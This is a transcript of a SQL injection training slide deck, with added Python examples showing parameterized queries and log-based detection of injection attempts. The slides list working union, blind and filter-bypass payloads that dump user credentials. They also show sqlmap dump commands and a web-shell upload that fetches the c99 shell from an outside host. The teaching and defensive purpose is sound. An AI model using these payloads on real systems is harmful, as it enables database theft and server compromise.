practical approach towards sqli ppt
DESCRIPTION
Sql injection, types of sqli injection, hands on
TRANSCRIPT
![Page 1: Practical Approach towards SQLi ppt](https://reader035.vdocument.in/reader035/viewer/2022062307/554f42bfb4c90572088b5401/html5/thumbnails/1.jpg)
Sqli Injection
![Page 2: Practical Approach towards SQLi ppt](https://reader035.vdocument.in/reader035/viewer/2022062307/554f42bfb4c90572088b5401/html5/thumbnails/2.jpg)
#whoami
Ahamed Saleem @saleem14489
Security Researcher @CDAC
![Page 3: Practical Approach towards SQLi ppt](https://reader035.vdocument.in/reader035/viewer/2022062307/554f42bfb4c90572088b5401/html5/thumbnails/3.jpg)
Agenda
● What is Sql Injection
● Types of sql injection
– Error based Injection (String, numeric, Union, error)
– Time based Blind SQLi
– Boolean based Blind SQLi
– Cookie based Injection
– Compromising Database server using SQLi (upload a shell)
– Exploitation using SQLmap
– Bypass filters to successfully exploit SQLi.
![Page 4: Practical Approach towards SQLi ppt](https://reader035.vdocument.in/reader035/viewer/2022062307/554f42bfb4c90572088b5401/html5/thumbnails/4.jpg)
Baa, baa, black hat
Have you any sploits?
Yes, sir, yes, sir
3 bulletproof choices
One for Java
One for IE
One for Chrome
(ha ha ha)
![Page 5: Practical Approach towards SQLi ppt](https://reader035.vdocument.in/reader035/viewer/2022062307/554f42bfb4c90572088b5401/html5/thumbnails/5.jpg)
What Is Sql?
➔ Structured Query Language is designed for managing data held in a relational database management system (RDBMS).
➔ The scope of SQL includes data insert, update and delete, schema creation and modification, and data access control.
![Page 6: Practical Approach towards SQLi ppt](https://reader035.vdocument.in/reader035/viewer/2022062307/554f42bfb4c90572088b5401/html5/thumbnails/6.jpg)
Definition Of Sql Injection
Def:
“SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to affect the execution of predefined SQL commands”
Cause:
It is a flaw in “web application development”; it is not a DB or web server problem
→ most programmers are still not aware of this problem → a lot of the solutions posted on the internet are not good enough
![Page 7: Practical Approach towards SQLi ppt](https://reader035.vdocument.in/reader035/viewer/2022062307/554f42bfb4c90572088b5401/html5/thumbnails/7.jpg)
Anatomy Of Sql Injection
Sql Injection
– Error Based
– Blind Based
  – Boolean Based
  – Time Based
![Page 8: Practical Approach towards SQLi ppt](https://reader035.vdocument.in/reader035/viewer/2022062307/554f42bfb4c90572088b5401/html5/thumbnails/8.jpg)
![Page 9: Practical Approach towards SQLi ppt](https://reader035.vdocument.in/reader035/viewer/2022062307/554f42bfb4c90572088b5401/html5/thumbnails/9.jpg)
© C-DAC, Hyderabad - 2013
SQL Injection – Illustrated
[Figure: the OWASP "SQL Injection – Illustrated" diagram. Left to right: Firewall, Hardened OS, Web Server, App Server, Firewall, Databases, Legacy Systems, Web Services, Directories, Human Resrcs, Billing, Custom Code; Network Layer / Application Layer; business functions Accounts, Finance, Administration, Transactions, Communication, Knowledge Mgmt, E-Commerce. The "APPLICATION ATTACK" path runs HTTP request → SQL query → DB Table → HTTP response.]
Injected query: "SELECT * FROM accounts WHERE acct='' OR 1=1--'"
1. Application presents a form to the attacker
2. Attacker sends an attack in the form data
3. Application forwards attack to the database in a SQL query
4. Database runs query containing attack and sends encrypted results back to application
5. Application decrypts data as normal and sends results to the user
Account Summary panel (Account / SKU): Acct:5424-6066-2134-4334, Acct:4128-7574-3921-0192, Acct:5424-9383-2039-4029, Acct:4128-0004-1234-0293
![Page 10: Practical Approach towards SQLi ppt](https://reader035.vdocument.in/reader035/viewer/2022062307/554f42bfb4c90572088b5401/html5/thumbnails/10.jpg)
OWASP Top 10
![Page 11: Practical Approach towards SQLi ppt](https://reader035.vdocument.in/reader035/viewer/2022062307/554f42bfb4c90572088b5401/html5/thumbnails/11.jpg)
Myth
● Escaping input prevents Sql Injection
● Sql Injection is an old problem, so I don't have to worry about it
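A worked illustration of the "Cause" slide (the flaw lives in application code) and of the escaping myth above. This is an added example, not part of the deck: it uses Python's built-in sqlite3 with a constructed users table (the names and placeholder hashes are assumed) and runs the deck's own `' OR 1=1--` input through three lookup styles, so the difference between concatenation, quote-escaping and parameter binding can be seen on real rows.

```python
"""Why SQL injection is a flaw in application code (slide "Cause") and why
"escaping input prevents SQL injection" is a myth (slide "Myth").  Added
example, not from the slides: a constructed in-memory SQLite users table is
queried with the deck's own inputs through three lookup styles."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample table: three users; the password column holds placeholders."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    con.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "alice", "<hash-1>"), (2, "bob", "<hash-2>"), (3, "admin", "<hash-3>")],
    )
    return con


def lookup_concat(con: sqlite3.Connection, user_id: str):
    """The flaw: the request value is pasted into the statement text.  A quote
    in the input closes the string literal and the rest is parsed as SQL."""
    sql = "SELECT id, username FROM users WHERE id = '" + user_id + "'"
    return con.execute(sql).fetchall()


def lookup_escaped_numeric(con: sqlite3.Connection, user_id: str):
    """The myth: doubling single quotes does neutralise the quoted-string case,
    but a numeric comparison has no quotes to escape, so `1 OR 1=1` goes
    straight through.  Escaping is context-dependent; binding is not."""
    escaped = user_id.replace("'", "''")
    sql = "SELECT id, username FROM users WHERE id = " + escaped
    return con.execute(sql).fetchall()


def lookup_parameterized(con: sqlite3.Connection, user_id: str):
    """The fix: the value travels as a bound parameter and is never parsed as
    SQL.  An injected clause is just a string that matches no id."""
    return con.execute(
        "SELECT id, username FROM users WHERE id = ?", (user_id,)
    ).fetchall()


if __name__ == "__main__":
    con = make_db()
    inputs = [("benign", "1"), ("quoted payload", "1' OR 1=1--"), ("numeric payload", "1 OR 1=1")]
    for label, value in inputs:
        for fn in (lookup_concat, lookup_escaped_numeric, lookup_parameterized):
            try:
                rows = fn(con, value)
                print(f"{fn.__name__:24} {label:16} -> {len(rows)} row(s)")
            except sqlite3.Error as exc:
                # A payload that breaks the query's syntax surfaces here; on a
                # real site that is the "error based" signal the deck describes.
                print(f"{fn.__name__:24} {label:16} -> error: {exc}")
```

Running the block prints one line per combination: the concatenated lookup returns all three rows for the quoted payload, the escaped numeric lookup returns all three rows for `1 OR 1=1`, and the parameterized lookup returns exactly one row for `1` and none for either payload. The same pattern holds for MySQL prepared statements; SQLite is used here only so the example runs offline.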
![Page 12: Practical Approach towards SQLi ppt](https://reader035.vdocument.in/reader035/viewer/2022062307/554f42bfb4c90572088b5401/html5/thumbnails/12.jpg)
Error Based Injections
Error-based SQL injections are primarily those in which the SQL server dumps some errors back to the user via the web application, and this error aids in successful exploitation.
![Page 13: Practical Approach towards SQLi ppt](https://reader035.vdocument.in/reader035/viewer/2022062307/554f42bfb4c90572088b5401/html5/thumbnails/13.jpg)
A methodological approach is always helpful in understanding the underlying logic. The major process is as follows:
1. Enumerate the application behavior
2. Fuzz the application with bogus data with the goal of crashing the application
3. Try to control the injection point by guessing the query used in the back-end
4. Extract the data from the back-end database
Enough theory, time for some action.
Demo
![Page 14: Practical Approach towards SQLi ppt](https://reader035.vdocument.in/reader035/viewer/2022062307/554f42bfb4c90572088b5401/html5/thumbnails/14.jpg)
● id=1' --+
● id=1' AND 1=1 --+
● id=1' union select 1,2,3 --+
● id=999' union select 1,2,3 --+
● id=-1' union select 1,table_name,3 from information_schema.tables where table_schema=database() --+
● id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+
● id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+
● id=-1' union select 1,group_concat(username),group_concat(password) from users --+
![Page 15: Practical Approach towards SQLi ppt](https://reader035.vdocument.in/reader035/viewer/2022062307/554f42bfb4c90572088b5401/html5/thumbnails/15.jpg)
Blind Injections
Blind SQL injections are those injections in which the backend database reacts to the input, but somehow the errors are concealed by the web application and not displayed to the end users
Boolean Based:
The information must be inferred from the behavior of the page by asking the server true/false questions
Time Based:
Gain information by observing timing delays in the response of the database
![Page 16: Practical Approach towards SQLi ppt](https://reader035.vdocument.in/reader035/viewer/2022062307/554f42bfb4c90572088b5401/html5/thumbnails/16.jpg)
![Page 17: Practical Approach towards SQLi ppt](https://reader035.vdocument.in/reader035/viewer/2022062307/554f42bfb4c90572088b5401/html5/thumbnails/17.jpg)
Boolean Based Injections
select ascii(substr(database(),1,1));
id=1' AND (ascii(substr((select database()),3,1))) = 99 --+
id=1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))=101 --+
![Page 18: Practical Approach towards SQLi ppt](https://reader035.vdocument.in/reader035/viewer/2022062307/554f42bfb4c90572088b5401/html5/thumbnails/18.jpg)
Time based Injections
id=1' and if((select database()="security"), sleep(10),null) --+
id=1' and if ((select substr(table_name,1,1) from information_schema.tables where table_schema=database() limit 0,1 ) ='e' , sleep(10) , null)--+
![Page 19: Practical Approach towards SQLi ppt](https://reader035.vdocument.in/reader035/viewer/2022062307/554f42bfb4c90572088b5401/html5/thumbnails/19.jpg)
Uploading shell
http://localhost/sqli-labs-master/Less-1/?id=-1' union select "","","<?system($_REQUEST['cmd'];?>"
into outfile '/var/www/shell.php' --+
http://localhost/shell.php?cmd=wget http://www.r57shell.net/shell/c99.txt
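From the defender's side, the payload families on the error-based, boolean, time-based and shell-upload slides above leave recognisable traces in the web server's access log. The following is an added example and not part of the deck: a small signature-based log triage in Python. The log lines are constructed (Apache combined-log style, trimmed, with the deck's payloads URL-encoded as a browser would send them), and the names `SAMPLE_LOG`, `SIGNATURES`, `classify` and `scan_log` are this example's own. The signature set is a starting point for a detection rule, not a complete one.

```python
"""Signature-based triage of web access logs for the SQLi payload families
shown in this deck: UNION/information_schema enumeration, boolean blind,
time-based blind (sleep/benchmark), and INTO OUTFILE file writes.
Added example; the log lines below are constructed."""
import re
from urllib.parse import unquote_plus

# Constructed sample lines.  Line 1 and line 6 are benign; lines 2-5 carry
# the deck's payloads percent-encoded the way a browser submits them.
SAMPLE_LOG = """
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /Less-1/?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /Less-1/?id=1%27%20AND%201%3D1%20--%2B HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /Less-1/?id=-1%27%20union%20select%201%2Cgroup_concat%28table_name%29%2C3%20from%20information_schema.tables%20where%20table_schema%3Ddatabase%28%29--%2B HTTP/1.1" 200 640
10.0.0.5 - - [01/Jan/2024:10:00:14 +0000] "GET /Less-1/?id=1%27%20and%20if%28%28select%20database%28%29%3D%22security%22%29%2C%20sleep%2810%29%2Cnull%29%20--%2B HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:15 +0000] "GET /Less-1/?id=-1%27%20union%20select%20%22%22%2C%22%22%2C%22x%22%20into%20outfile%20%27/var/www/shell.php%27%20--%2B HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:01:00 +0000] "GET /search?q=union+station+hours HTTP/1.1" 200 2048
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD|PUT|DELETE|PATCH) (\S+) HTTP/')
CLIENT_RE = re.compile(r"^(\S+)")

# (label, pattern) pairs applied to the decoded, lower-cased, whitespace-normalised target.
SIGNATURES = [
    ("union-based", re.compile(r"\bunion\b(?:\s+all)?\s+select\b")),
    ("schema-enum", re.compile(r"\binformation_schema\s*\.\s*(?:tables|columns)\b")),
    # A quote, digit or ')' followed by a boolean operator and a tautology,
    # ascii()/if() probe or subquery: the shape of the boolean-blind slides.
    ("boolean-blind", re.compile(
        r"""['"\d)]\s*(?:and|or|&&|\|\|)\s*\(*\s*(?:\d+\s*=\s*\d+|ascii\s*\(|if\s*\(|select\b)""")),
    ("time-blind", re.compile(r"\b(?:sleep|benchmark|pg_sleep)\s*\(|\bwaitfor\s+delay\b")),
    ("file-write", re.compile(r"\binto\s+(?:out|dump)file\b")),
]


def normalise(target: str) -> str:
    """Percent-decode (twice, so a double-encoded payload is still seen),
    blank out inline /* */ comments, lower-case and collapse whitespace."""
    text = target
    for _ in range(2):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    text = re.sub(r"/\*.*?\*/", " ", text)
    return re.sub(r"\s+", " ", text.lower()).strip()


def classify(line: str) -> list:
    """Return the sorted signature labels that fire on one access-log line."""
    match = REQUEST_RE.search(line)
    if not match:
        return []
    text = normalise(match.group(1))
    return sorted(label for label, pattern in SIGNATURES if pattern.search(text))


def scan_log(log_text: str) -> list:
    """Return (line_no, client_ip, labels) for every line that hits a signature."""
    hits = []
    for number, line in enumerate(log_text.strip().splitlines(), start=1):
        labels = classify(line)
        if labels:
            client = CLIENT_RE.match(line)
            hits.append((number, client.group(1) if client else "?", labels))
    return hits


if __name__ == "__main__":
    for number, ip, labels in scan_log(SAMPLE_LOG):
        print(f"line {number} from {ip}: {', '.join(labels)}")
```

On the sample, lines 2 to 5 are flagged (boolean-blind; schema-enum plus union-based; boolean-blind plus time-blind; file-write plus union-based) and the two benign requests, including the one whose search term happens to contain the word "union", are not. Decoding before matching matters: the `%26%26` form of `&&` on the filter-bypass slide only becomes visible after `unquote_plus`, and a detector that matched the raw line would miss it. For time-based probes, pairing this with response-time outliers (the 10-second gap between lines 3 and 4 above) gives a second, payload-independent signal.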
![Page 20: Practical Approach towards SQLi ppt](https://reader035.vdocument.in/reader035/viewer/2022062307/554f42bfb4c90572088b5401/html5/thumbnails/20.jpg)
SqlMap detects and exploits SQLi flaws
Features:
● Full support for MySQL, Oracle, PostgreSQL and Microsoft SQL Server
● Three SQL Injection techniques:
  – Boolean-based
  – Union queries
  – Batched queries
● Perform an extensive back-end DBMS fingerprint
![Page 21: Practical Approach towards SQLi ppt](https://reader035.vdocument.in/reader035/viewer/2022062307/554f42bfb4c90572088b5401/html5/thumbnails/21.jpg)
SqlMap detects and exploits SQLi flaws
● Enumerate users, password hashes, privileges, databases, tables, columns and their data-type
● Dump entire or user specified database table entries
● Run custom SQL statements
![Page 22: Practical Approach towards SQLi ppt](https://reader035.vdocument.in/reader035/viewer/2022062307/554f42bfb4c90572088b5401/html5/thumbnails/22.jpg)
Dishum Dishum using SQLMAP
![Page 23: Practical Approach towards SQLi ppt](https://reader035.vdocument.in/reader035/viewer/2022062307/554f42bfb4c90572088b5401/html5/thumbnails/23.jpg)
– First detect the vulnerable URLs
– Now use sqlmap:
1. python sqlmap.py -u http://site.com/?id=1 {Identify whether sqli is present or not}
2. python sqlmap.py -u http://site.com/?id=1 --dbs {Discover databases}
3. ./sqlmap -u http://site.com/?id=1 --tables -D <db name> {tables in db}
4. ./sqlmap -u http://site.com/?id=1 --columns -D <db name> -T <table name>
5. ./sqlmap -u http://site.com/?id=1 --dump -D <db name> -T <table name> {data}
![Page 24: Practical Approach towards SQLi ppt](https://reader035.vdocument.in/reader035/viewer/2022062307/554f42bfb4c90572088b5401/html5/thumbnails/24.jpg)
Uploading Shell Using SQLMap:
1. Check if the current user is DBA or not.
./sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 --current-user --is-dba
2. Now enter the webserver path
./sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 --os-cmd -v 1
3. Now the webshell can be loaded using the sqlmap file stager.
DEMO
![Page 25: Practical Approach towards SQLi ppt](https://reader035.vdocument.in/reader035/viewer/2022062307/554f42bfb4c90572088b5401/html5/thumbnails/25.jpg)
ByPassing the blacklist Filters
Bypass AND and OR:
● id=1' || 1=1 --+
● id=1' %26%26 1=1 --+
![Page 26: Practical Approach towards SQLi ppt](https://reader035.vdocument.in/reader035/viewer/2022062307/554f42bfb4c90572088b5401/html5/thumbnails/26.jpg)
Hands On
![Page 27: Practical Approach towards SQLi ppt](https://reader035.vdocument.in/reader035/viewer/2022062307/554f42bfb4c90572088b5401/html5/thumbnails/27.jpg)
Methodology
● Break it
– Try to break the query by fuzzing
● Fix it
– Now, based on the error, try to balance and fix the query
![Page 28: Practical Approach towards SQLi ppt](https://reader035.vdocument.in/reader035/viewer/2022062307/554f42bfb4c90572088b5401/html5/thumbnails/28.jpg)
What did we cover?
✔ What is Sql Injection
✔ Types of Sql Injection
✔ Hands on
![Page 29: Practical Approach towards SQLi ppt](https://reader035.vdocument.in/reader035/viewer/2022062307/554f42bfb4c90572088b5401/html5/thumbnails/29.jpg)
Further Roadmap
* Websites and References
OWASP, WASC, MSDN
* Books and Mailing Lists
Web Application Hackers Handbook, OWASP Guides
* Tools to use
Burp, Paros, Firefox Extensions, Virtual Box, Linux
![Page 30: Practical Approach towards SQLi ppt](https://reader035.vdocument.in/reader035/viewer/2022062307/554f42bfb4c90572088b5401/html5/thumbnails/30.jpg)
Acknowledge
● @Sqlilabs
● @Google
● @Nullhyd
● @cswan
● @thenounproject
![Page 31: Practical Approach towards SQLi ppt](https://reader035.vdocument.in/reader035/viewer/2022062307/554f42bfb4c90572088b5401/html5/thumbnails/31.jpg)
Thank U
@saleem14489 Facebook.com/ahamedssaleem